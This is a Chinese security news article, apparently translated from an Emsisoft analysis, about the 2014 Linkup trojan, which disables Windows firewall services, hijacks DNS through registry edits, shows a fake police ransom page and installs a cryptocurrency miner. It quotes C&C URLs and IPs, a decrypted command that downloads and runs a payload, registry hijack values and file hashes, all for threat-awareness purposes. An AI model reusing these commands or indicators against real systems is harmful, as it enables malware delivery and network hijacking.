悄悄的干活,打枪的不要!勒索+比特币挖矿木马

2014-02-10 +6 167317人围观 ,发现 18 个不明物体 资讯

FreeBuf曾报道过一些勒索用户支付赎金的木马:

    1千万英国用户被Cryptolocker勒索软件瞄准

    英国NCA向公众发出警告:CryptoLocker恶意程序肆虐网络

    如何保护你的计算机不被恶意软件勒索

    气焰嚣张勒索木马:打劫你没商量

    地下论坛惊见全新档案加密勒索软件PowerLocker

Emsisoft团队最近发现了一款名为"Linkup"的木马(Trojan-Ransom.Win32.Linkup),Linkup不会直接加密电脑中的档案,而是直接关闭Windows防火墙服务、锁定你的DNS然后让你的机器辅助挖比特币。

这一切当然是悄悄的进行的,当你不能正常上网了之后会发现浏览器经常会访问这个网页:

或者这样:

看似一本正经的 Council of Europe 的页面 (体验一下: 62.75.221.37),甚至会警告你观看“儿童色情”,只需0.01欧元就可以立即恢复网络链接。

一旦Linkup执行后,会在%AppData%\Microsoft\Windows文件夹下创建svchost.exe,然后禁用windows的安全和防火墙服务:

Linkup会向服务器以加密的形式POST你机器的信息:


token解密后大致是这样:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

这包含了你的编号,系统的版本,使用的是何种语言。这样会方便木马的感染,让Linkup知道在什么样的机器上工作并且是否在正常工作。

Linkup使用了冗余机制,解密后会发现准备了多台C&C服务器:

hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg


C&C服务器会向Linkup发送如下加密后的指令:

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

解密的key是

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

解开后是这样的(如图):

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe


IL 62.75.221.37 命令会重定向每一条http请求到勒索的页面上。同样,Linkup 也在注册表中做了手脚:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"NameServer" = "127.0.0.1"
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"DhcpNameServer" = "127.0.0.1"

重启服务,保证DNS毒化成功:

RUN hxxp://91.220.163.22/pts2.exe 命令会让你的计算机下载并运行 pts2.exe , pts2.exe会伪装成Svchost.exe并下载hxxp://64.32.28.155/b.exe,b.exe会存储在C:\Users\Public\b.exe 。这是一个自解压程序,其中的脚本会释放一个64位的PE文件,命名为j.exe ,也就是jhProtominer 。正如其名称所暗示的, jhProtominer是一个Protoshares挖掘应用程序。

黑客利用Linkup获得了更强的计算能力来获取更多的比特币,为了使挖矿僵尸网络间保持通信流畅,毒化了dns并顺便想要敲诈受害者一笔(钱或重要口令和个人信息)。


来自Emsisoft团队的相关文件hash:

Trojan-Ransom.Win32.LinkupMD5: f1304992523cd68f7412a355d2fb9d5dSHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae
pts2.exe (Trojan-Downloader.Win32.Linkup)MD5: 7eb809d8ea5bfe602648752289669632SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
b.exe (Trojan.Win32.Miner – Self-extracting Archive)MD5: 29eea4cd040bff1028d5b6092f22f9bfSHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79
j.exe (jhProtominer)MD5: 2e9a71e4ee33d190056e081e6726fa56
SHA1: db355fc276b8174e1753f45dbdf52536f7740316

[翻译:嘎巴嘎巴,参考:emsisoft:cryptolocker-a-new-ransomware-variant THN:linkup-first-ransomware-trojan-that]

这些评论亮了

发表评论

已有 18 条评论

取消
Loading...
css.php